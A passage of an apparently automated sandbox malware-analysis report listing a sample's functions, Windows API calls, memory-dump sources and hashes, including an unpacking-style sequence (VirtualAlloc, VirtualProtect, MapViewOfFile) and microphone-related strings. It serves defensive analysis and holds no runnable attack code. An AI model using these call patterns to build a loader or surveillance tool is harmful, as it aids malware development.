                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                                                                                                                                                                                          Function 0079E5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9eb4f438231cdf1f5a0390a81fae76cf41a7faa79662d3ed8606b3b5fb6622e9
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14510F72605206EFDF29CF54F985BAAB7A4EF58310F24452DE802872A1E73DEC51CB91
                                                                                                                                                                                                                                                                                                                          Function 0052AFD0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 188302963-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                                                                                                                                                                                          Function 004E5C20 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                                                                                                                                                                                          • String ID: echosuppression$gain
                                                                                                                                                                                                                                                                                                                          • API String ID: 967401230-1829011300
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                                          • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                                                                                                                                                                                          Function 00509EC0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,00153804), ref: 00509F3D
                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 662013055-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                                          • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                                                                                                                                                                                          Function 0079DE91 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0079DEAD
                                                                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0079DEC6
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 00b83a8abc7ce385ab32bf354e41978ee56b478a752cb83b12f0cae4687b3bd0
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801FC32149351AEAE3537747CCA96A27A9EB56774B200329F525491E1EF2D5C016344
                                                                                                                                                                                                                                                                                                                          Function 004D2AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                                                                                                                                                                                          • String ID: Macromed\Flash\
                                                                                                                                                                                                                                                                                                                          • API String ID: 2606042488-1438515271
                                                                                                                                                                                                                                                                                                                          • Opcode ID: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                                                                                                                                                                                          Function 004F2BF0 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                                                                                                                                                                                          Function 004F64A0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                                                                                                                                                                                          Function 00401380 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0

                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                          Function 02AA02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02AA0326
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AA00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02AA00CD
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AA00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02AA0279
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02AA0378
                                                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 02AA03E7
                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02AA0407
                                                                                                                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02AA042E
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02AA0456
                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 02AA0471
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
